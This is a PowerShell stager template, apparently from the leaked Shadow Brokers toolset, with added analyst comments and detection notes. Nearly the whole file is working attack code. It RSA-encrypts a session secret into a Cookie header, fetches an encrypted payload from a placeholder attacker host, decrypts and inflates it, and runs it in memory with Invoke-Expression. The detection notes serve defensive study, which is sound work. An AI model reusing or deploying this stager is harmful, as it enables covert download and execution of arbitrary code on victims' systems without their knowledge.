shadowbrokers-exploits/windows/Resources/Ops/Tools/ZiPo/decryptor_downloader.base
2017-04-14 11:45:07 +02:00


# Analyst summary: this is a stager template that fetches an encrypted script and runs it in memory.
# Stages: (1) generate a random 32-byte session secret, (2) send it RSA-encrypted in the HTTP
# Cookie header, (3) AES-CBC decrypt the response with a key derived from that secret,
# (4) inflate the plaintext, (5) pass the resulting text to Invoke-Expression.
# The tokens <MODULUS>, <EXPONENT>, <IP>, <PORT>, <FILENAME> and <IV> are placeholders; the file
# is not valid PowerShell until they are filled in (presumably by the tooling that ships this
# .base file -- not visible here).
#
# Detection notes (from the behaviour visible below):
#   - The script itself writes nothing to disk; the host-side record is the PowerShell
#     engine's own telemetry (script block logging / AMSI see the text handed to iex).
#   - The session secret leaves the host only under RSA, so a packet capture alone does not
#     yield the AES key for the response body.
#   - The outbound request is plain HTTP from System.Net.WebClient, and its Cookie header is
#     a single Base64 string rather than name=value pairs.
#   - RSACryptoServiceProvider + RijndaelManaged + DeflateStream + iex in one script block
#     is a distinctive combination to hunt for.

# RSA public key components, supplied as byte arrays by the template placeholders.
[byte[]]$modulus = @(<MODULUS>);
[byte[]]$exponent = @(<EXPONENT>);
# 32-byte buffer, zero-initialised here and overwritten with CSPRNG output two lines below.
# This is the per-run session secret from which the AES key is later derived.
[byte[]]$i1 = @(0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00);
$rng = New-Object System.Security.Cryptography.RNGCryptoServiceProvider;
$rng.getBytes($i1);
# Import the public key and encrypt the session secret. The second argument to Encrypt is
# fOAEP; $False selects PKCS#1 v1.5 padding.
$rsa = New-Object System.Security.Cryptography.RSACryptoServiceProvider;
$keyobject = New-Object System.Security.Cryptography.RSAParameters;
$keyobject.Modulus = $modulus;
$keyobject.Exponent = $exponent;
$rsa.importparameters($keyobject);
$output = $rsa.encrypt($i1,$False);
$rsa.clear();
# The RSA ciphertext is Base64-encoded and sent as the entire Cookie header value.
$b64output = [Convert]::tobase64string($output);
$wc = New-Object System.Net.Webclient;
$wc.Headers["Cookie"] = $b64output;
# Single GET over unencrypted HTTP; the response body is treated as Base64 text (decoded below).
$a = $wc.downloadstring('http://<IP>:<PORT>/<FILENAME>');
$encoding = New-Object System.Text.ASCIIEncoding;
# The CBC IV is baked into the template as Base64, not received from the server.
$iv = [Convert]::FromBase64String('<IV>');
$data = [Convert]::FromBase64String($a);
# Key derivation: BitConverter.ToString gives upper-case hex pairs joined by '-'; the dashes
# are stripped, the 64-character hex string is ASCII-encoded and hashed with SHA-1, and the
# first 16 bytes of the digest become the AES-128 key.
$bad_password = [System.BitConverter]::ToString($i1);
$good_password = $bad_password -replace "\-","";
$key = $encoding.GetBytes($good_password);
$sha_sum = New-Object System.Security.Cryptography.Sha1CryptoServiceProvider;
$password = $sha_sum.computehash($key);
[Byte[]] $e = $password[0..15];
# Rijndael in CBC mode with zero padding.
$f = New-Object System.Security.Cryptography.RijndaelManaged;
$f.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;
$f.Mode = [System.Security.Cryptography.CipherMode]::CBC;
# Plaintext buffer sized to the ciphertext length. The decrypted bytes are read with one
# Read call; the returned count ($r) is never used, so the whole buffer is passed on.
[Byte[]] $h = New-Object Byte[]($data.length);
$g = $f.CreateDecryptor($e, $iv);
$i = New-Object System.IO.MemoryStream($data, $True);
$j = New-Object System.Security.Cryptography.CryptoStream($i, $g, [System.Security.Cryptography.CryptoStreamMode]::Read);
$r = $j.Read($h, 0, $h.Length);
$i.Close();
$j.Close();
$f.Clear();
# Wrap the plaintext in a stream and discard its first two bytes before inflating.
# NOTE(review): presumably this skips a 2-byte zlib header so DeflateStream sees raw
# deflate data -- confirm against a captured sample.
$mz = New-Object System.IO.MemoryStream(,$h);
$mz.readbyte() | out-null;
$mz.readbyte() | out-null;
$zip = New-Object IO.Compression.DeflateStream($mz, [System.IO.Compression.CompressionMode]::Decompress);
$sw = New-Object IO.StreamReader($zip);
$uncompressed_data = $sw.Readtoend();
$sw.Close();
$zip.close();
$mz.close();
# The decompressed text is executed as PowerShell in the current session. Nothing above
# verifies the content before this point; what runs is whatever the server returned.
iex $uncompressed_data;